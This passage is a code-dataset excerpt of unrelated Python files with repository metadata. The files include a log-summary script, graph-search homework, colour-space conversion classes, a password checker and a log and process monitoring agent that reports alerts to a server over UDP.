first_assignment = False
if smallest > mean_error:
smallest = mean_error
best_order = order
print("the best order to fit the data is {}\n".format(best_order))
main(train,test)
| {
"repo_name": "newmangonzala/Python-Projects",
"path": "crossValidation.py",
"copies": "1",
"size": "4258",
"license": "mit",
"hash": 5514317151605293000,
"line_mean": 20.8358974359,
"line_max": 70,
"alpha_frac": 0.4560826679,
"autogenerated": false,
"ratio": 2.878972278566599,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.38350549464665995,
"avg_score": null,
"num_lines": null
} |
#a='61.159.140.123 - - [23/Aug/2014:00:01:42 +0800] "GET /favicon.ico HTTP/1.1" 404 \ "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36 LBBROWSER" "-"'
line_dict={}
line = open('www_access.log','r')
for i in line:
b= i.split(' ')
key = (b[0],b[6],b[8])
line_dict[key] = line_dict.get(key,0) + 1
# key = (ip,url,code)
# if key not in line_dict:
# line_dict[key] = 0
# line_dict[key] += 1
line.close()
#print line_dict
line_list = line_dict.items()
#[(key,value),(key,value)]
for j in range(10):
for i in range(len(line_list) - 1):
if line_list[i][1] > line_list[i + 1][1]:
temp = line_list[i]
line_list[i] = line_list[i + 1]
line_list[i + 1] = temp
html=open('top_log.txt','w')
#print line_list[-1:-11:-1]
for node in line_list[-1:-11:-1]:
html.write('%s %s %s %s \n' % (node[1],node[0][0],node[0][1],node[0][2]))
html.close()
html1='''
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'/>
<title>{biaoti}</title>
</head>
<body>
<table>
<trade>
<tr>
{kaitou}
</tr>
</thead>
<tbody>
<tr>
{ruilong}
</tr>
</tbody>
</table>
</body>
</html>
'''
biaoti='top_10'
kaitou='<th>cishu</th><th>IP</th><th>URL</th><th>Code</th>'
ruilong=''
html2=open('top_log10.html','w')
for node in line_list[-1:-11:-1]:
ruilong +='<tr><td>%s</td> <td>%s</td> <td>%s</td> <td>%s</td></tr>' % (node[1],node[0][0],node[0][1],node[0][2])
html2=open('top_log10.html','w')
html2.write(html1.format(biaoti=biaoti,kaitou=kaitou,ruilong=ruilong))
html2.close()
| {
"repo_name": "51reboot/actual_09_homework",
"path": "03/xionghuihui/top_log10.py",
"copies": "1",
"size": "1772",
"license": "mit",
"hash": -8426590600778502000,
"line_mean": 27.5806451613,
"line_max": 208,
"alpha_frac": 0.5101580135,
"autogenerated": false,
"ratio": 2.5170454545454546,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.35272034680454545,
"avg_score": null,
"num_lines": null
} |
A = 6.9107755 # -ln(0.001)
B = 4.7105307 # -ln(0.009)
C = 2.5133061 # -ln(0.081)
D = 0.3160815 # -ln(0.729)
routes = []
def dijkstra(graph, src, dest, visited=[], distances={}, predecessors={}):
if src not in graph:
raise TypeError('The root of the shortest path tree cannot be found')
if dest not in graph:
raise TypeError('The target of the shortest path cannot be found')
if src == dest:
path = []
pred = dest
while pred != None:
path.append(pred)
pred = predecessors.get(pred, None)
print('shortest path: ' + str(path) + " cost=" + str(distances[dest]))
else:
if not visited:
distances[src] = 0
for neighbor in graph[src]:
if neighbor not in visited:
new_distance = distances[src] + graph[src][neighbor]
if new_distance < distances.get(neighbor, float('inf')):
distances[neighbor] = new_distance
predecessors[neighbor] = src
visited.append(src)
unvisited = {}
for k in graph:
if k not in visited:
unvisited[k] = distances.get(k, float('inf'))
x = min(unvisited, key=unvisited.get)
dijkstra(graph, x, dest, visited, distances, predecessors)
def problem1():
graph = {'s': {'a': 0},
'a': {'b': B, 'c': A},
'b': {'d': B, 'e': C},
'c': {'f': A, 'g': D},
'd': {'h': B, 'i': C},
'e': {'j': C, 'k': B},
'f': {'h': B, 'i': C},
'g': {'j': C, 'k': B},
'h': {'l': D, 'm': A},
'i': {'n': C, 'o': B},
'j': {'l': B, 'm': C},
'k': {'n': A, 'o': D},
'l': {'t': 0},
'm': {'t': 0},
'n': {'t': 0},
'o': {'t': 0},
't': {},
}
dijkstra(graph, 's', 't')
def find_paths(node, cities, path, distance):
path.append(node)
if len(path) > 1:
distance += cities[path[-2]][node]
if (len(cities) == len(path)) and (cities[path[-1]].has_key(path[0])):
global routes
path.append(path[0])
distance += cities[path[-2]][path[0]]
print path, distance
routes.append([distance, path])
return
for city in cities:
if (city not in path) and (cities[city].has_key(node)):
find_paths(city, dict(cities), list(path), distance)
def problem2():
cities = {
'A': {'B': 6, 'C': 2, 'D': 2, 'E': 3},
'B': {'A': 2, 'C': 4, 'D': 3, 'E': 7},
'C': {'A': 5, 'B': 3, 'D': 2, 'E': 1},
'D': {'A': 1, 'B': 9, 'C': 4, 'E': 3},
'E': {'A': 3, 'B': 7, 'C': 3, 'D': 5},
}
print "Start: A"
find_paths('A', cities, [], 0)
print "\n"
routes.sort()
if len(routes) != 0:
print "Shortest route: %s" % routes[0]
else:
print "FAILED"
def main():
problem1()
problem2()
if __name__ == '__main__':
main()
| {
"repo_name": "LittleBun/Personal",
"path": "EE618/hw2.py",
"copies": "1",
"size": "3058",
"license": "unlicense",
"hash": -237437106050191650,
"line_mean": 28.6893203883,
"line_max": 78,
"alpha_frac": 0.4401569653,
"autogenerated": false,
"ratio": 3.1689119170984457,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.41090688823984456,
"avg_score": null,
"num_lines": null
} |
"""A98 RGB color class."""
from ._space import RE_DEFAULT_MATCH
from .srgb import SRGB
from .xyz import XYZ
from . import _convert as convert
from .. import util
import re
import math
def lin_a98rgb_to_xyz(rgb):
"""
Convert an array of linear-light a98-rgb values to CIE XYZ using D50.D65.
(so no chromatic adaptation needed afterwards)
http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html
which has greater numerical precision than section 4.3.5.3 of
https://www.adobe.com/digitalimag/pdfs/AdobeRGB1998.pdf
"""
m = [
[0.5766690429101305, 0.1855582379065463, 0.1882286462349947],
[0.29734497525053605, 0.6273635662554661, 0.07529145849399788],
[0.02703136138641234, 0.07068885253582723, 0.9913375368376388]
]
return util.dot(m, rgb)
def xyz_to_lin_a98rgb(xyz):
"""Convert XYZ to linear-light a98-rgb."""
m = [
[2.0415879038107465, -0.5650069742788596, -0.34473135077832956],
[-0.9692436362808795, 1.8759675015077202, 0.04155505740717557],
[0.013444280632031142, -0.11836239223101838, 1.0151749943912054]
]
return util.dot(m, xyz)
def lin_a98rgb(rgb):
"""Convert an array of a98-rgb values in the range 0.0 - 1.0 to linear light (un-corrected) form."""
return [math.copysign(abs(val) ** (563 / 256), val) for val in rgb]
def gam_a98rgb(rgb):
"""Convert an array of linear-light a98-rgb in the range 0.0-1.0 to gamma corrected form."""
return [math.copysign(abs(val) ** (256 / 563), val) for val in rgb]
class A98RGB(SRGB):
"""A98 RGB class."""
SPACE = "a98-rgb"
DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space=SPACE))
WHITE = convert.WHITES["D65"]
@classmethod
def _to_xyz(cls, rgb):
"""To XYZ."""
return cls._chromatic_adaption(cls.white(), XYZ.white(), lin_a98rgb_to_xyz(lin_a98rgb(rgb)))
@classmethod
def _from_xyz(cls, xyz):
"""From XYZ."""
return gam_a98rgb(xyz_to_lin_a98rgb(cls._chromatic_adaption(XYZ.white(), cls.white(), xyz)))
| {
"repo_name": "dmilith/SublimeText3-dmilith",
"path": "Packages/mdpopups/st3/mdpopups/coloraide/colors/a98_rgb.py",
"copies": "1",
"size": "2071",
"license": "mit",
"hash": -6456953194400418000,
"line_mean": 28.1690140845,
"line_max": 104,
"alpha_frac": 0.6619990343,
"autogenerated": false,
"ratio": 2.7798657718120805,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8939081012354723,
"avg_score": 0.000556758751471583,
"num_lines": 71
} |
"""A98 RGB color class."""
from ..spaces import RE_DEFAULT_MATCH
from ..spaces import _cat
from .srgb import SRGB
from .xyz import XYZ
from .. import util
import re
import math
def lin_a98rgb_to_xyz(rgb):
"""
Convert an array of linear-light a98-rgb values to CIE XYZ using D50.D65.
(so no chromatic adaptation needed afterwards)
http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html
which has greater numerical precision than section 4.3.5.3 of
https://www.adobe.com/digitalimag/pdfs/AdobeRGB1998.pdf
"""
m = [
[0.5767308871981476, 0.1855539507112141, 0.1881851620906385],
[0.2973768637115448, 0.6273490714522, 0.0752740648362554],
[0.0270342603374131, 0.0706872193185578, 0.9911085203440293]
]
return util.dot(m, rgb)
def xyz_to_lin_a98rgb(xyz):
"""Convert XYZ to linear-light a98-rgb."""
m = [
[2.04136897926008, -0.5649463871751959, -0.3446943843778484],
[-0.9692660305051867, 1.8760108454466937, 0.0415560175303498],
[0.0134473872161703, -0.1183897423541256, 1.0154095719504166]
]
return util.dot(m, xyz)
def lin_a98rgb(rgb):
"""Convert an array of a98-rgb values in the range 0.0 - 1.0 to linear light (un-corrected) form."""
return [math.copysign(abs(val) ** (563 / 256), val) for val in rgb]
def gam_a98rgb(rgb):
"""Convert an array of linear-light a98-rgb in the range 0.0-1.0 to gamma corrected form."""
return [math.copysign(abs(val) ** (256 / 563), val) for val in rgb]
class A98RGB(SRGB):
"""A98 RGB class."""
SPACE = "a98-rgb"
DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space=SPACE))
WHITE = _cat.WHITES["D65"]
@classmethod
def _to_xyz(cls, rgb):
"""To XYZ."""
return _cat.chromatic_adaption(cls.white(), XYZ.white(), lin_a98rgb_to_xyz(lin_a98rgb(rgb)))
@classmethod
def _from_xyz(cls, xyz):
"""From XYZ."""
return gam_a98rgb(xyz_to_lin_a98rgb(_cat.chromatic_adaption(XYZ.white(), cls.white(), xyz)))
| {
"repo_name": "facelessuser/sublime-markdown-popups",
"path": "st3/mdpopups/coloraide/spaces/a98_rgb.py",
"copies": "1",
"size": "2047",
"license": "mit",
"hash": -6484839432329325000,
"line_mean": 27.8309859155,
"line_max": 104,
"alpha_frac": 0.6580361505,
"autogenerated": false,
"ratio": 2.7737127371273713,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3931748887627371,
"avg_score": null,
"num_lines": null
} |
"""A98 RGB color class."""
from ..spaces import RE_DEFAULT_MATCH
from ..spaces import _cat
from .srgb import SRGB
from .xyz import XYZ
from .. import util
import re
def lin_a98rgb_to_xyz(rgb):
"""
Convert an array of linear-light a98-rgb values to CIE XYZ using D50.D65.
(so no chromatic adaptation needed afterwards)
http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html
which has greater numerical precision than section 4.3.5.3 of
https://www.adobe.com/digitalimag/pdfs/AdobeRGB1998.pdf
"""
m = [
[0.5767308871981476, 0.1855539507112141, 0.1881851620906385],
[0.2973768637115448, 0.6273490714522, 0.0752740648362554],
[0.0270342603374131, 0.0706872193185578, 0.9911085203440293]
]
return util.dot(m, rgb)
def xyz_to_lin_a98rgb(xyz):
"""Convert XYZ to linear-light a98-rgb."""
m = [
[2.04136897926008, -0.5649463871751959, -0.3446943843778484],
[-0.9692660305051867, 1.8760108454466937, 0.0415560175303498],
[0.0134473872161703, -0.1183897423541256, 1.0154095719504166]
]
return util.dot(m, xyz)
def lin_a98rgb(rgb):
"""Convert an array of a98-rgb values in the range 0.0 - 1.0 to linear light (un-corrected) form."""
return [util.npow(val, 563 / 256) for val in rgb]
def gam_a98rgb(rgb):
"""Convert an array of linear-light a98-rgb in the range 0.0-1.0 to gamma corrected form."""
return [util.npow(val, 256 / 563) for val in rgb]
class A98RGB(SRGB):
"""A98 RGB class."""
SPACE = "a98-rgb"
DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space=SPACE))
WHITE = _cat.WHITES["D65"]
@classmethod
def _to_xyz(cls, rgb):
"""To XYZ."""
return _cat.chromatic_adaption(cls.white(), XYZ.white(), lin_a98rgb_to_xyz(lin_a98rgb(rgb)))
@classmethod
def _from_xyz(cls, xyz):
"""From XYZ."""
return gam_a98rgb(xyz_to_lin_a98rgb(_cat.chromatic_adaption(XYZ.white(), cls.white(), xyz)))
| {
"repo_name": "facelessuser/ColorHelper",
"path": "lib/coloraide/spaces/a98_rgb.py",
"copies": "1",
"size": "1999",
"license": "mit",
"hash": -9157492764690160000,
"line_mean": 27.5571428571,
"line_max": 104,
"alpha_frac": 0.6588294147,
"autogenerated": false,
"ratio": 2.7610497237569063,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.39198791384569065,
"avg_score": null,
"num_lines": null
} |
a = 'A1213pokl'
b = 'bAse730onE'
c = 'asasasasasasasaas'
d = 'QWERTYqwerty'
e = '123456123456'
f = 'QwErTy911poqqqq'
#---------------My Solution-----------------#
def checkio(password):
lower = "abcdefghijklmnopqrstuvwxyz"
upper = lower.upper()
boollower = False
boolupper = False
boolnum = False
if len(password) >= 10 :
for i in password:
if (i in lower):
boollower = True
elif (i in upper):
boolupper = True
elif i.isdigit():
boolnum = True
else:
return (False)
if boollower and boolupper and boolnum:
return (True)
else:
return (False)
else:
return ("Password not long enough")
print (checkio(f))
#---------------Best Solution-----------------#
def checkio(data):
'Return True if password strong and False if not'
num = False
upper = False
lower = False
for i in range(len(data)):
num = num or data[i].isnumeric()
upper = upper or data[i].isupper()
lower = lower or data[i].islower()
return num and upper and lower and len(data)>=10
print (checkio(f)) | {
"repo_name": "ismk/Python-Examples",
"path": "checkio.py",
"copies": "1",
"size": "1117",
"license": "mit",
"hash": 976909252119754500,
"line_mean": 21.3125,
"line_max": 53,
"alpha_frac": 0.57564906,
"autogenerated": false,
"ratio": 3.1914285714285713,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.42670776314285713,
"avg_score": null,
"num_lines": null
} |
# aa436.py
#
# This is the Agent for Project 436. An instance of aa436.py runs
# on every host to be monitored. After an aa436.py Agent is started it will:
# - Listen for UDP "I am here" broadcast notifications from ax436.py Servers.
# - Request configuration from the first ax436.py Server that it finds.
# - Commence monitoring for:
# o Pattern matches in log files.
# o Processes not running.
# o System resource limit breaches (eg. disk space, inode usage, memory, load)
# - The aa436.py Agent will send regular heartbeat messages to the ax436.py Server
# (if idle).
# - Reset and re-load its configuration if told to do so by the ax436.py Server.
# Copyright (c) 2013, Chris Bristow
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import sys
import os
import time
import re
import select
import string
import subprocess
import logging
import logging.handlers
from socket import *
# Globals:
# This list includes shared lists of log files to check, processes to monitor,
# the queue of updates to sent to the server etc.
file_consumer_list = []
host_name = os.uname()[1]
ps_command = []
process_list = []
uid_seed = 0
alert_queue = []
cmd_list = []
logger = logging.getLogger(__name__)
# Return True if current time is within range
# given in active_string (format: day_numbers;HH:MM-HH:MM, ...).
def is_active(active_string):
if(len(active_string) == 0):
actv = True
else:
actv = False
ltm = time.localtime()
for t in active_string.split(','):
tmt = re.match('^([0-9]+);(\d+):(\d+)\-(\d+):(\d+)$', t)
if tmt:
if(((ltm[3] * 60) + ltm[4]) >= ((int(tmt.group(2)) * 60) + int(tmt.group(3))) and ((ltm[3] * 60) + ltm[4]) <= ((int(tmt.group(4)
) * 60) + int(tmt.group(5)))):
if(tmt.group(1).find(str(ltm[6])) > -1):
actv = True
return(actv)
# An instance of file_consumer is created for each file
# tracking configuration.
class file_consumer:
def __init__(self, filename, matches, actions, exceeds):
global logger
self.open = False
self.filename = filename
self.seek = 2
self.matches = matches
self.tags = actions['tags']
self.message = ''
self.active = ''
logger.info('Creating file consumer for file '+filename+' (patterns: '+str(matches)+', '+str(actions)+')')
if('message' in actions):
self.message = actions['message']
self.period = 0
if('period' in actions):
self.period = int(actions['period'])
self.threshold = 0
if('threshold' in actions):
self.threshold = int(actions['threshold'])
self.count = 0
self.next_report = time.time() + self.period
self.metric = 0
if('metric' in actions):
self.metric = int(actions['metric'])
if('active' in actions):
self.active = actions['active']
# Logs when a file consumer is closed down - this happens when
# an aa436.py Agent receives a Reset command from the ax436.py Server.
def __del__(self):
self.fd.close()
logger.info('Removing file consumer for file '+self.filename)
# Checks to see if any of the "periodic" file events
# need to be raised. Examples of periodic events for files are:
# - A count of the number of matches of a set of strings within a time period.
# - An event raised if no instances of a specified string have appeared in a
# log file within a time period.
def check_period(self):
if(self.period > 0):
if(time.time() > self.next_report):
# Alert if matches exceed the threshold.
if(self.threshold > 0 and self.count > self.threshold and len(self.message) > 0):
self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + self.message ]
# Alert if no matches within n seconds.
elif(self.count == 0 and len(self.message) > 0 and self.threshold == 0):
self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + self.message ]
# Output the count of matches every n seconds.
elif(len(self.message) == 0):
self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + str(self.count) ]
self.next_report = time.time() + self.period
self.count = 0
# The main program calls read() for each file tracker. Returns
# a list of events from the do_read() function if within an active
# time, otherwise returns an empty list.
def read(self):
if(is_active(self.active) == True):
return(self.do_read())
else:
return([])
# This function does the actual file reading. Logic to deal with
# log files "rolling" is contained here.
def do_read(self):
global logger
self.list = []
self.check_period()
self.finished = False
while(self.finished == False):
if(self.open == False):
try:
self.st = os.stat(self.filename)
self.inode = self.st.st_ino
self.fd = open(self.filename)
self.fd.seek(0, self.seek)
self.open = True
self.seek = 0
except Exception:
logger.error('Error: File '+self.filename+' not found')
self.finished = True
else:
self.cp = self.fd.tell()
self.nextline = self.fd.readline()
if not self.nextline:
try:
self.st = os.stat(self.filename)
if(self.st.st_ino != self.inode):
self.fd.close()
self.open = False
else:
self.fd.seek(self.cp)
self.finished = True
except Exception:
logger.error('Error: File '+self.filename+' not found')
self.finished = True
else:
for m in self.matches:
if(re.search(m,self.nextline) is not None):
if(self.period > 0):
self.count += 1
elif(len(self.message) > 0):
# Alert every match with a pre-defined message.
self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + self.message ]
else:
# Alert every match with the actual line matched.
self.list = self.list + [ self.tags + '%%' + self.filename + '%%' + self.nextline.strip() ]
return(self.list)
# This function is called when an aa436.py Agent first receives configuation
# from an ax436.py Agent.
def do_config(conf):
global file_consumer_list
global ps_command
global process_list
global cmd_list
global logger
c_file = ''
c_match = []
c_active = ''
c_process = ''
logger.info('Configuration received from server')
for cl in conf.split('%%'):
m = re.match('^([a-z_:]+)\s+(.+)\s*$', cl)
if m:
cmd = m.group(1)
arg = m.group(2)
if(cmd == 'file:'):
c_file = arg
elif(cmd == 'match:'):
c_match += [ arg ]
elif(cmd == 'active:'):
c_active = arg
elif(cmd == 'alert_all:' and len(c_match) > 0 and len(c_file) > 0):
am = re.match('^tags=(\S+)\s+message=(.+)\s*$', arg)
if am:
file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am.group(1), 'message': am.group(2), 'active': c_active }, '') ]
else:
am2 = re.match('^tags=(\S+)\s*$', arg)
if am2:
file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am2.group(1), 'active': c_active }, '') ]
c_file = ''
c_match = []
c_active = ''
elif(cmd == 'alert_n:' and len(c_match) > 0 and len(c_file) > 0):
am = re.match('^tags=(\S+)\s+threshold=(\d+)\s+seconds=(\d+)\s+message=(.+)\s*$', arg)
if am:
file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am.group(1), 'threshold': am.group(2), 'period': am.group(3), 'message': am.group(4), 'active': c_active }, '') ]
c_file = ''
c_match = []
c_active = ''
elif(cmd == 'alert_count:' and len(c_match) > 0 and len(c_file) > 0):
am = re.match('^tags=(\S+)\s+seconds=(\d+)\s*$', arg)
if am:
file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am.group(1), 'period': am.group(2), 'metric': '1', 'active': c_active }, '') ]
c_file = ''
c_match = []
c_active = ''
elif(cmd == 'alert_inactive:' and len(c_match) > 0 and len(c_file) > 0):
am = re.match('^tags=(\S+)\s+seconds=(\d+)\s+message=(.+)\s*$', arg)
if am:
file_consumer_list += [ file_consumer(c_file, c_match, { 'tags': am.group(1), 'period': am.group(2), 'message': am.group(3), 'metric': '2', 'active': c_active }, '') ]
c_file = ''
c_match = []
c_active = ''
elif(cmd == 'ps_command:'):
ps_command = arg.split()
logger.info('Process check command: '+str(ps_command))
elif(cmd == 'process:'):
c_process = arg
elif(cmd == 'alert_running:' and len(c_process) > 0):
pc = re.match('^tags=(\S+)\s+min=(\d+)\s+max=(\d+)\s+message=(.+)\s*$', arg)
if pc:
pc_rec = { 'match': c_process, 'tags': pc.group(1), 'min': int(pc.group(2)), 'max': int(pc.group(3)), 'message': pc.group(4), 'count': 0, 'error': 0, 'active': c_active }
process_list += [ pc_rec ]
logger.info('Watching process: '+str(pc_rec))
c_process = ''
c_active = ''
elif(cmd == 'run:'):
cm = re.match('^command=(.+)\s+extract=(.+)\s*$', arg)
if cm:
new_cmd_list = { 'command': cm.group(1).strip().split(), 'extract': cm.group(2).strip(), 'alerts': [] }
logger.info('Running command: '+str(new_cmd_list))
cmd_list.append(new_cmd_list)
elif(cmd == 'alert_if:'):
cm = re.match('^tags=(\S+)\s+match=(\d+),(\S+)\s+upper_limit=(\d+),([0-9\.]+)\s+message=(.+)\s*$', arg)
if cm:
new_cmd_alist = { 'tags': cm.group(1), 'match_n': int(cm.group(2)), 'match_str': cm.group(3), 'upper_limit_n': int(cm.group(4)), 'upper_limit_v': float(cm.group(5)), 'message': cm.group(6), 'active': c_active }
logger.info('Alerting on command output: '+str(new_cmd_alist))
cmd_list[len(cmd_list)-1]['alerts'].append(new_cmd_alist)
c_active = ''
cm = re.match('^tags=(\S+)\s+match=(\d+),(\S+)\s+lower_limit=(\d+),([0-9\.]+)\s+message=(.+)\s*$', arg)
if cm:
new_cmd_alist = { 'tags': cm.group(1), 'match_n': int(cm.group(2)), 'match_str': cm.group(3), 'lower_limit_n': int(cm.group(4)), 'lower_limit_v': float(cm.group(5)), 'message': cm.group(6), 'active': c_active }
logger.info('Alerting on command output: '+str(new_cmd_alist))
cmd_list[len(cmd_list)-1]['alerts'].append(new_cmd_alist)
c_active = ''
elif(cmd == 'alert_metric:'):
cm = re.match('^tags=(\S+)\s+match=(\d+),(\S+)\s+metric=(\d+)\s*$', arg)
if cm:
new_cmd_alist = { 'tags': cm.group(1), 'match_n': int(cm.group(2)), 'match_str': cm.group(3), 'metric': int(cm.group(4)), 'active': c_active }
logger.info('Publishing on command output: '+str(new_cmd_alist))
cmd_list[len(cmd_list)-1]['alerts'].append(new_cmd_alist)
c_active = ''
# This function is called to erase all current configuration if the aa436.py Agent is
# sent a Reset command by the ax436.py Server.
def do_unconfig():
global logger
global file_consumer_list
global ps_command
global process_list
global cmd_list
logger.info('Unconfiguring')
file_consumer_list = []
ps_command = []
process_list = []
cmd_list = []
# This function is called to add a new alert to the alert queue.
# Alerts are sent to the ax436.py Server one by one. Each has
# to be acknowleged before the next is sent.
def queue_alert(alert):
global uid_seed
global alert_queue
global logger
if(len(alert_queue) < 256):
logger.info(time.ctime()+' Queueing: '+alert)
uid = '{0}_{1}'.format(int(time.time()), uid_seed)
uid_seed += 1
alert_queue += [ [ uid, alert, 0, int(time.time()) ] ]
else:
logger.info(time.ctime()+' Alert not queued (queue full): '+alert)
# This is the main program loop. UDP sockets are initialised and then
# a loop is entered which invokes log file checks, process checks etc.
# as well as receiving commands from the ax436.py Server.
def main(port):
global process_list
global alert_queue
global logger
global host_name
global cmd_list
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.handlers.RotatingFileHandler('aa436.log', maxBytes = 1000000, backupCount = 4))
logger.info(time.ctime())
logger.info('Listening on port '+str(port))
logger.info('Server on port '+str(port + 1))
server_name = ''
server_seen = 0
server_seen_timeout = 30
configured = False
last_config_req = 0
last_update = time.time()
idle_time = 67
alert_queue = []
process_check_interval = 20
next_process_check = int(time.time()) + process_check_interval
stats_check_interval = 60
next_stats_check = int(time.time()) + stats_check_interval
last_process_event = 0
addr = ('', port)
ad_sock = socket(AF_INET, SOCK_DGRAM)
ad_sock.bind(addr)
inputs = [ ad_sock ]
outputs = []
while(True):
readable, writable, exceptional = select.select(inputs, outputs, inputs, 1.0)
for rs in readable:
udp_data = rs.recv(65536)
m = re.match('^([A-Z]+)%%(.+)', udp_data.decode())
if m:
cmd = m.group(1)
arg = m.group(2)
if(cmd == 'SRVHB'):
if(arg == server_name):
server_seen = time.time()
if(len(server_name) == 0):
server_name = arg
logger.info('Selected server: '+arg)
elif(cmd == 'CONFIG'):
do_config(arg)
configured = True
elif(cmd == 'RESET'):
if(arg == host_name):
do_unconfig()
last_config_req = time.time() + 10
configured = False
elif(cmd == 'ACK'):
if(arg == alert_queue[0][0]):
del alert_queue[0]
if(server_seen > 0 and time.time() > (server_seen + server_seen_timeout)):
logger.info('Deselected server: '+server_name)
server_name = ''
server_seen = 0
if(configured == False and len(server_name) > 0 and time.time() > (last_config_req + 10)):
last_config_req = time.time()
logger.info('Requesting configuration from '+server_name+' on port '+str(port+1))
ad_sock.sendto(('CONFREQ%%'+os.uname()[1]).encode(), (server_name, port+1))
last_update = time.time()
if(server_seen > 0 and time.time() > (last_update + idle_time) and len(alert_queue) < 3):
queue_alert('SYSTEM%%NULL%%Idle')
last_update = time.time()
for fc in file_consumer_list:
for alert in fc.read():
queue_alert(alert)
if(len(ps_command) > 0 and int(time.time()) > next_process_check):
ps_output = subprocess.check_output(ps_command)
for zeroing_idx in range(len(process_list)):
process_list[zeroing_idx]['count'] = 0
for ps_line in ps_output.decode().split('\n'):
for watching_idx in range(len(process_list)):
pm = re.search(process_list[watching_idx]['match'], ps_line)
if pm:
process_list[watching_idx]['count'] += 1
for checking_idx in range(len(process_list)):
if(process_list[checking_idx]['count'] < process_list[checking_idx]['min'] or process_list[checking_idx]['count'] > process_list[checking_idx]['max']):
process_list[checking_idx]['error'] += 1
else:
process_list[checking_idx]['error'] = 0
if(process_list[checking_idx]['error'] > 1 and is_active(process_list[checking_idx]['active']) == True):
process_alert_msg = process_list[checking_idx]['tags'] + '%%NULL%%' + process_list[checking_idx]['message'] + ' [' + str(process_list[checking_idx]['count']) + ']'
queue_alert(process_alert_msg)
process_list[checking_idx]['error'] = 0
last_process_event = int(time.time())
next_process_check = int(time.time()) + process_check_interval
if(time.time() > next_stats_check):
for run_cmd in cmd_list:
for cmd_output_line in subprocess.check_output(run_cmd['command']).decode().split('\n'):
c_ext = re.search(run_cmd['extract'], cmd_output_line)
if c_ext:
for run_alist in run_cmd['alerts']:
if('upper_limit_n' in run_alist and is_active(run_alist['active'])):
if(run_alist['match_str'] == c_ext.group(run_alist['match_n']) and float(c_ext.group(run_alist['upper_limit_n'])) > run_alist['upper_limit_v']):
queue_alert(run_alist['tags']+'%%NULL%%'+run_alist['message'])
elif('lower_limit_n' in run_alist and is_active(run_alist['active'])):
if(run_alist['match_str'] == c_ext.group(run_alist['match_n']) and float(c_ext.group(run_alist['lower_limit_n'])) < run_alist['lower_limit_v']):
queue_alert(run_alist['tags']+'%%NULL%%'+run_alist['message'])
elif('metric' in run_alist and is_active(run_alist['active'])):
if(run_alist['match_str'] == c_ext.group(run_alist['match_n'])):
queue_alert(run_alist['tags']+'%%NULL%%'+str(c_ext.group(run_alist['metric'])))
next_stats_check = int(time.time()) + stats_check_interval
if(last_process_event > 0 and time.time() > (last_process_event + (process_check_interval * 2) + 30)):
last_process_event = 0
queue_alert('SYSTEM%%NULL%%Process check: All clear')
if(len(alert_queue) > 0):
if(int(time.time()) > alert_queue[0][2]):
ad_sock.sendto(('ALERT%%'+host_name+'%%'+alert_queue[0][0]+'%%'+str(alert_queue[0][3])+'%%'+alert_queue[0][1]).encode(), (server_name, port+1))
alert_queue[0][2] = int(time.time()) + 10
last_update = time.time()
# Start hook. The only argument an aa436.py Agent takes is the UDP
# port to listen for broadcasts from the ax436.py Server on.
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: aa436.py udp_port')
exit(1)
else:
main(int(sys.argv[1]))
| {
"repo_name": "chrisbristow/project-436",
"path": "aa436.py",
"copies": "1",
"size": "19655",
"license": "bsd-2-clause",
"hash": 2314344826890936000,
"line_mean": 31.9229480737,
"line_max": 220,
"alpha_frac": 0.5937420504,
"autogenerated": false,
"ratio": 3.398167358229599,
"config_test": true,
"has_no_keywords": false,
